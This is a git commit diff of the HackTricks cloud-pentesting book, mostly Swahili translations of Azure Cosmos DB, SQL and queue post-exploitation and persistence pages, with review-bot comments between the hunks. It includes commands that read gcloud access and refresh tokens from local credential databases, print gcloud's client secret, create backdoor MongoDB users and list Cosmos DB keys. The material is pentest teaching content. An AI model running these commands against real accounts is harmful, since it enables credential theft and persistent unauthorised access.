Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

Translator
2025-02-20 23:14:43 +00:00
parent acafe4bc3c
commit e85437dc6c
7 changed files with 78 additions and 202 deletions

File diff suppressed because one or more lines are too long


@@ -142,7 +142,7 @@
- [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md)
- [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md)
- [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md)
- [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
- [GCP - Token Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.md)
- [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md)
- [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md)
- [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md)
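Review bot: the new link target `pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.md` on the `- [GCP - Token Persistence](...)` line needs a file at that path after this commit, but this page only shows `gcp-non-svc-persistance.md` being deleted (the `@@ -1,90 +0,0 @@` hunk further down) and no addition of the new name, so unless the rename sits in the suppressed diff the SUMMARY entry will dangle. Please confirm the renamed file is present and grep the tree for `{{#ref}}` links that still use the old `persistance` spelling.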
@@ -458,8 +458,8 @@
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
- [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md)
- [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - MySQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
- [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
- [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
@@ -489,8 +489,8 @@
- [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
- [Az - Automation Accounts Persistence](pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.md)
- [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
- [Az - Queue SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistance.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
- [Az - Queue SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistence.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistence.md)
- [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
- [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
- [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)
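Review bot: the sidebar title `Az - Queue SQL Persistence` is carried over unchanged onto the new `az-sql-persistence.md` line even though the page it points to is headed `# Az - SQL Persistence` (visible in the deleted `az-sql-persistance.md` below); since the line is being rewritten anyway, drop the stray `Queue` so the entry matches the page. As with the other renames in this commit, the visible diff shows the old `az-sql-persistance.md` and `az-queue-persistance.md` files removed but no additions of `az-sql-persistence.md` and `az-queue-persistence.md`, so both targets should be verified to exist before merge.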


@@ -1,29 +0,0 @@
# Az - Hifadhi ya Queue
{{#include ../../../banners/hacktricks-training.md}}
## Queue
Kwa maelezo zaidi angalia:
{{#ref}}
../az-services/az-queue.md
{{#endref}}
### Vitendo: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
Ruhusa hii inamruhusu mshambuliaji kuunda au kubadilisha queues na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda queues zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya queue ili kuwezesha mashambulizi zaidi.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## Marejeo
- [https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues](https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues)
- [https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api](https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api)
- [https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes](https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes)
{{#include ../../../banners/hacktricks-training.md}}
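Review bot: `az-queue-persistance.md` is removed wholesale here while SUMMARY.md now links to `az-queue-persistence.md`, and no addition of the new file is visible on this page; if this is a rename, the new copy should be confirmed to have landed with the same content. While re-adding it, the `az storage queue policy set ... --expiry 2024-12-31T23:59:59Z` example already lies in the past relative to this commit's date (2025-02-20), so a reader copying it gets a policy that is expired on creation; a `<expiry-date>` placeholder would age better.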


@@ -1,20 +0,0 @@
# Az - SQL Persistence
{{#include ../../../banners/hacktricks-training.md}}
## SQL
Kwa maelezo zaidi angalia:
{{#ref}}
../az-services/az-sql.md
{{#endref}}
### Mbinu za Kawaida za Kudumu
- Pata taarifa za SQL au tengeneza mtumiaji wa SQL (kuwezesha uthibitishaji wa SQL ikiwa inahitajika)
- Teua mtumiaji aliyeathiriwa kama msimamizi wa Entra ID (kuwezesha uthibitishaji wa Entra ID ikiwa inahitajika)
- Backdoor katika VM (ikiwa VM ya SQL inatumika)
- Tengeneza sheria ya FW ili kudumisha ufikiaji wa hifadhidata ya SQL
{{#include ../../../banners/hacktricks-training.md}}
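Review bot: `az-sql-persistance.md` is removed in full, but no `az-sql-persistence.md` addition appears on this page even though SUMMARY.md now links to that path; confirm the renamed file exists and that its heading `# Az - SQL Persistence` carries over, since the SUMMARY entry still labels it `Az - Queue SQL Persistence`.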


@@ -11,15 +11,28 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### `Microsoft.DocumentDB/databaseAccounts/read` && `Microsoft.DocumentDB/databaseAccounts/write`
Kwa ruhusa hii, unaweza kuunda au kuboresha akaunti za Azure Cosmos DB. Hii inajumuisha kubadilisha mipangilio ya akaunti, kuongeza au kuondoa maeneo, kubadilisha viwango vya usawa, na kuwezesha au kuzima vipengele kama vile maandiko ya maeneo mengi.
Kwa ruhusa hii, unaweza kuunda au kuboresha akaunti za Azure Cosmos DB. Hii inajumuisha kubadilisha mipangilio ya akaunti, kuwezesha au kuzima uhamaji wa kiotomatiki, kusimamia udhibiti wa ufikiaji wa mtandao, kuweka sera za akiba, na kurekebisha viwango vya usawa. Washambuliaji wenye ruhusa hii wanaweza kubadilisha mipangilio ili kudhoofisha udhibiti wa usalama, kuharibu upatikanaji, au kuhamasisha data kwa kubadilisha sheria za mtandao.
```bash
az cosmosdb update \
--name <account_name> \
--resource-group <resource_group_name> \
--public-network-access ENABLED
```
```bash
az cosmosdb update \
--account-name <account_name> \
--resource-group <resource_group_name> \
--capabilities EnableMongoRoleBasedAccessControl
```
Zaidi ya hayo, unaweza kuwezesha utambulisho unaosimamiwa katika akaunti:
```bash
az cosmosdb identity assign \
--name <cosmosdb_account_name> \
--resource-group <resource_group_name>
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/read` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/write`
Kwa ruhusa hii, unaweza kuunda au kubadilisha kontena (makusanyo) ndani ya database ya SQL ya akaunti ya Azure Cosmos DB. Kontena zinatumika kuhifadhi data, na mabadiliko kwao yanaweza kuathiri muundo wa database na mifumo ya ufikiaji.
Kwa ruhusa hii, unaweza kuunda au kubadilisha kontena (makusanyo) ndani ya hifadhidata ya SQL ya akaunti ya Azure Cosmos DB. Kontena zinatumika kuhifadhi data, na mabadiliko kwao yanaweza kuathiri muundo wa hifadhidata na mifumo ya ufikiaji.
```bash
# Create
az cosmosdb sql container create \
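Review bot: the two `az cosmosdb update` blocks added in this hunk address the account with different flags (`--name` in the first, `--account-name` in the second); `az cosmosdb update` takes the account as `--name/-n`, and `--account-name` is the spelling of the sub-resource commands such as `az cosmosdb sql container create`, so the second block should use `--name` as well or it will not run as written. The rewritten paragraph also never says what either command changes: add a one-line lead-in per block stating that the first opens the account to the public internet (`--public-network-access ENABLED`) and the second switches on MongoDB RBAC (`--capabilities EnableMongoRoleBasedAccessControl`, only meaningful for a MongoDB-API account); both are control-plane changes that a defender should be alerting on from the activity log, which is worth a sentence here.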
@@ -47,7 +60,7 @@ az cosmosdb sql database create \
```
### `Microsoft.DocumentDB/databaseAccounts/failoverPriorityChange/action`
Kwa ruhusa hii, unaweza kubadilisha kipaumbele cha kufeli cha maeneo kwa akaunti ya database ya Azure Cosmos DB. Kitendo hiki kinatathmini mpangilio ambao maeneo yanakuwa ya msingi wakati wa tukio la kufeli. Matumizi yasiyo sahihi ya ruhusa hii yanaweza kuharibu upatikanaji wa juu wa database au kusababisha athari zisizokusudiwa za uendeshaji.
Kwa ruhusa hii, unaweza kubadilisha kipaumbele cha kufeli cha maeneo kwa akaunti ya hifadhidata ya Azure Cosmos DB. Kitendo hiki kinamua mpangilio ambao maeneo yanakuwa ya msingi wakati wa tukio la kufeli. Matumizi yasiyo sahihi ya ruhusa hii yanaweza kuharibu upatikanaji wa juu wa hifadhidata au kusababisha athari zisizokusudiwa za uendeshaji.
```bash
az cosmosdb failover-priority-change \
--name <database_account_name> \
@@ -66,7 +79,7 @@ az cosmosdb keys regenerate \
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/read`
Kwa ruhusa hii, unaweza kuunda au kubadilisha triggers ndani ya kontena la database ya SQL katika akaunti ya Azure Cosmos DB. Triggers zinakuwezesha kutekeleza mantiki ya upande wa seva kama jibu kwa operesheni.
Kwa ruhusa hii, unaweza kuunda au kubadilisha triggers ndani ya kontena la database ya SQL katika akaunti ya Azure Cosmos DB. Triggers zinakuwezesha kutekeleza mantiki ya upande wa seva kama majibu ya operesheni.
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
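Review bot: the section headed `userDefinedFunctions/write` && `userDefinedFunctions/read` still describes triggers and its example is `az cosmosdb sql trigger create`, which duplicates the separate `triggers/write` section that follows; only the wording of the sentence was changed here, so while this paragraph is being edited it should be made to describe user-defined functions and the command switched to `az cosmosdb sql user-defined-function create`. Also, the new sentence keeps `database ya SQL` whereas the other lines touched in this file now standardize on `hifadhidata`.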
@@ -90,7 +103,7 @@ az cosmosdb sql stored-procedure create \
--body 'function sample() { return "Hello, Cosmos!"; }'
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/read`
Kwa ruhusa hii, unaweza kuunda au kubadilisha vichocheo ndani ya kontena la hifadhidata ya SQL katika akaunti ya Azure Cosmos DB. Vichocheo vinakuwezesha kutekeleza mantiki ya upande wa seva kama jibu kwa operesheni kama vile kuingiza, kusasisha, au kufuta.
Kwa ruhusa hii, unaweza kuunda au kubadilisha vichocheo ndani ya kontena la hifadhidata ya SQL katika akaunti ya Azure Cosmos DB. Vichocheo vinakuruhusu kutekeleza mantiki ya upande wa seva kama jibu kwa operesheni kama vile kuingiza, kusasisha, au kufuta.
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
@@ -112,59 +125,11 @@ az cosmosdb mongodb collection create \
--name <collection_name>
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/read`
Kwa ruhusa hii, unaweza kuunda hifadhidata mpya za MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kuandaa hifadhidata mpya kuhifadhi na kusimamia makusanyo na nyaraka.
Kwa ruhusa hii, unaweza kuunda hifadhidata mpya za MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kuandaa hifadhidata mpya kuhifadhi na kusimamia makusanyo na hati.
```bash
az cosmosdb mongodb database create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--name <database_name>
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`
Kwa ruhusa hii, unaweza kuunda ufafanuzi mpya wa majukumu ya MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kufafanua majukumu maalum yenye ruhusa maalum kwa watumiaji wa MongoDB.
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`
Kwa ruhusa hii, unaweza kuunda maelezo mapya ya mtumiaji wa MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu upatikanaji wa watumiaji wenye majukumu maalum na viwango vya ufikiaji kwa hifadhidata za MongoDB.
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "myUser",
"Password": "mySecurePassword",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
```
{{#include ../../../banners/hacktricks-training.md}}
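Review bot: the two MongoDB sections removed here (`mongodbRoleDefinitions/write` and `mongodbUserDefinitions/write`) reappear in the privilege-escalation page later in this commit, so the move is fine, but any page that linked to these headings by anchor will now break; grep for links to the old anchors and repoint them. The removed copy also hardcoded `"Password": "mySecurePassword"` and `"UserName": "myUser"`; the relocated version uses `<mySecurePassword>` and `<myUser>` placeholders, which is the right call and should be kept.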


@@ -11,7 +11,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### (`Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read`) & (`Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read`)
Kwa ruhusa hizi unaweza kupandisha hadhi kwa kumuwezesha mtumiaji ruhusa za kutekeleza maswali na kuungana na hifadhidata. Kwanza, jukumu la ufafanuzi linaundwa likitoa ruhusa na mipaka inayohitajika.
Kwa ruhusa hizi unaweza kuongeza hadhi kwa kumpa mtumiaji ruhusa za kutekeleza maswali na kuungana na hifadhidata. Kwanza, jukumu la ufafanuzi linaundwa likitoa ruhusa na mipaka inayohitajika.
```bash
az cosmosdb sql role definition create \
--account-name <account_name> \
@@ -43,12 +43,63 @@ az cosmosdb sql role assignment create \
--principal-id <principal_id-togive-perms> \
--scope "/"
```
### (`Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`)&& (`Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`)
Kwa ruhusa hii, unaweza kuunda ufafanuzi mpya wa majukumu ya MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kufafanua majukumu maalum yenye ruhusa maalum kwa watumiaji wa MongoDB. Kazi za RBAC lazima ziwe zimewezeshwa ili kutumia hii.
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
```
Unaweza kuunda ufafanuzi mpya wa mtumiaji wa MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu ugawaji wa watumiaji wenye majukumu maalum na ufikiaji wa hifadhidata za MongoDB.
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "<myUser>",
"Password": "<mySecurePassword>",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
```
Baada ya hapo, mtumiaji mpya anaundwa ndani ya MongoDB, tunaweza kuufikia:
```bash
mongosh "mongodb://<myUser>:<mySecurePassword>@<account_name>.mongo.cosmos.azure.com:10255/<mymongodatabase>?ssl=true&replicaSet=globaldb&retrywrites=false"
```
### `Microsoft.DocumentDB/databaseAccounts/listKeys/action`
Kwa ruhusa hii, unaweza kupata funguo za msingi na za pili za akaunti ya Azure Cosmos DB. Funguo hizi zinatoa ufikiaji kamili kwa akaunti ya hifadhidata na rasilimali zake, na kuwezesha vitendo kama vile kusoma data, kuandika, na mabadiliko ya usanidi.
Kwa ruhusa hii, unaweza kupata funguo za msingi na za pili za akaunti ya Azure Cosmos DB. Funguo hizi zinatoa ufikiaji kamili kwa akaunti ya hifadhidata na rasilimali zake, zikihusisha vitendo kama vile kusoma data, kuandika, na mabadiliko ya usanidi.
```bash
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
```
{{#include ../../../banners/hacktricks-training.md}}
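Review bot: the new heading at the top of this hunk is malformed: `...mongodbRoleDefinitions/read`)&& (` lacks the space before `&&`, and it mixes `&&` with the `&` used by the equivalent `sqlRoleDefinitions ... ) & (` heading above; pick one form for both. In the `mongosh` line the placeholder `<mymongodatabase>` does not match the `<mydatabase>` used in the role and user definitions just above, and the connection URI carries the password on the command line, where it ends up in shell history and process listings; a short remark that the password should be supplied interactively or read from a file would be appropriate. Finally, the user definition is created with `"Mechanisms": "SCRAM-SHA-256"` but the paragraph never mentions that RBAC must already be enabled on the account (the earlier sentence says so only for role definitions), so state that once for both commands.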


@@ -1,90 +0,0 @@
# GCP - Token Persistance
{{#include ../../../banners/hacktricks-training.md}}
### Authenticated User Tokens
Ili kupata **token ya sasa** ya mtumiaji unaweza kukimbia:
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
Angalia katika ukurasa huu jinsi ya **kutumia moja kwa moja tokeni hii kwa kutumia gcloud**:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
{{#endref}}
Ili kupata maelezo ya **kuunda tokeni mpya ya ufikiaji** endesha:
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
Ni pia inawezekana kupata refresh tokens katika **`$HOME/.config/gcloud/application_default_credentials.json`** na katika **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
Ili kupata access token mpya iliyosasishwa kwa kutumia **refresh token**, client ID, na client secret endesha:
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
Uhalali wa refresh tokens unaweza kudhibitiwa katika **Admin** > **Security** > **Google Cloud session control**, na kwa default umewekwa kwa masaa 16 ingawa unaweza kuwekwa kutokufa milele:
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
### Auth flow
Mchakato wa uthibitishaji unapokuwa ukitumia kitu kama `gcloud auth login` utafungua dirisha katika kivinjari na baada ya kukubali maeneo yote kivinjari kitatumia ombi kama hili kwa bandari ya http iliyofunguliwa na chombo:
```
/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
```
Then, gcloud itatumia hali na msimbo pamoja na `client_id` (`32555940559.apps.googleusercontent.com`) na **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) kupata **data ya mwisho ya refresh token**.
> [!CAUTION]
> Kumbuka kwamba mawasiliano na localhost yako katika HTTP, hivyo inawezekana kukamata data ili kupata refresh token, hata hivyo data hii ni halali mara 1 tu, hivyo hii itakuwa haina maana, ni rahisi kusoma refresh token kutoka kwa faili.
### OAuth Scopes
Unaweza kupata scopes zote za Google katika [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) au kupata hizo kwa kutekeleza:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
Inawezekana kuona ni mipaka gani programu ambayo **`gcloud`** inatumia kujiandikisha inaweza kusaidia kwa kutumia skripti hii:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done
```
Baada ya kuitekeleza, ilikaguliwa kwamba programu hii inasaidia maeneo haya:
```
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email
```
ni ya kuvutia kuona jinsi programu hii inavyounga mkono **`drive`** scope, ambayo inaweza kumruhusu mtumiaji kupandisha hadhi kutoka GCP hadi Workspace ikiwa mshambuliaji atafanikiwa kumlazimisha mtumiaji kuunda tokeni yenye scope hii.
**Angalia jinsi ya** [**kudhulumu hii hapa**](../gcp-to-workspace-pivoting/index.html#abusing-gcloud)**.**
### Akaunti za Huduma
Kama ilivyo kwa watumiaji walioidhinishwa, ikiwa utafanikiwa **kudhulumu faili ya ufunguo wa faragha** ya akaunti ya huduma utaweza **kuipata kwa kawaida kwa muda wote unavyotaka**.\
Hata hivyo, ikiwa utaiba **tokeni ya OAuth** ya akaunti ya huduma hii inaweza kuwa ya kuvutia zaidi, kwa sababu, hata kama kwa kawaida tokeni hizi ni za manufaa kwa saa moja tu, ikiwa **mhasiriwa atafuta ufunguo wa faragha wa api, tokeni ya OAuh itabaki kuwa halali hadi itakapokwisha**.
### Metadata
Kwa wazi, kadri unavyokuwa ndani ya mashine inayofanya kazi katika mazingira ya GCP utaweza **kupata akaunti ya huduma iliyoambatanishwa na mashine hiyo kwa kuwasiliana na mwisho wa metadata** (zingatia kwamba tokeni za Oauth unazoweza kupata katika mwisho huu kwa kawaida zinapunguziliwa mbali na scopes).
### Marekebisho
Marekebisho kadhaa kwa mbinu hizi yanaelezwa katika [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
### Marejeleo
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
{{#include ../../../banners/hacktricks-training.md}}
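Review bot: `gcp-non-svc-persistance.md` is removed in full (90 lines) while SUMMARY.md now points at `gcp-non-svc-persistence.md`, and no addition of that file is visible on this page; confirm the renamed file exists with this content. Two things in the content are worth fixing in the new copy rather than carrying over: the first `curl ... | grep -oE` uses the character class `[a-zA-A/\-\._]*`, where `A-A` is a typo for `A-Z` (the second script below it has it right), and the GCP-to-Workspace link `../gcp-to-workspace-pivoting/index.html#abusing-gcloud` uses an `.html` path while every other cross-reference in this file goes through `{{#ref}}` with a `.md` target.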